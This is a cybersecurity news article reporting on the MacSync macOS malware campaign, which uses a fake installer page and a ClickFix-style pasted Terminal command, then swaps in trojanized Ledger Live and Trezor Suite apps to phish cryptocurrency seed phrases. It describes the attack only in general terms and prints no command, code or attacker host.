A new malware campaign has emerged in the macOS world, one that relies not on sophisticated exploits, but on good old-fashioned social engineering. It’s powered by the MacSync malware, distributed using the ” malware-as-a-service ” model, a low-cost service for cybercriminals that targets even the least experienced but highly active attackers.
MacSync masquerades as a cloud storage installer and is distributed via websites that appear almost indistinguishable from legitimate download portals.
In one case documented by CloudSEK specialists, the user was first redirected from a page simulating a Microsoft account login form and then to the “official” macOS app website.
There, no suspicious files were offered. Instead, the visitor was shown an error message and advised to use an “advanced installation method” via Terminal. What followed was a classic ClickFix scheme. The user was literally tricked into copying and pasting a single command line, supposedly required to complete the installation or fix a problem.
The command appeared harmless, but it actually downloaded and executed a remote malicious script. Because the action was voluntary, macOS didn’t detect anything suspicious: Gatekeeper, signature verification, and other protections simply failed.
Once installed, MacSync takes a long time to reveal itself. The malware operates silently, relying on long-term persistence on the system. One of its main functions is to replace the popular Electron applications with cryptocurrency hardware wallets, including Ledger Live and Trezor Suite.
Modified versions appear legitimate, but when the time comes, they start showing the user “service” screens, reporting errors and prompting them to restore their account. This scenario can occur even several weeks after infection.
The user is prompted to enter a PIN and a seed phrase, supposedly to resolve the issue; at that point, the attackers gain complete control of their cryptocurrency. Essentially, the trusted app is transformed into a sophisticated phishing tool.
Despite its status as a “low-cost MaaS solution,“ MacSync’s potential appears to be quite serious. The malware can collect browser data, crypto wallet information, keychain contents, and files.
This makes it dangerous not only for private users, but also for corporate devices, where macOS is increasingly used as a work platform.
Follow us on Google News to receive daily updates on cybersecurity. Contact us if you would like to report news, insights or content for publication.
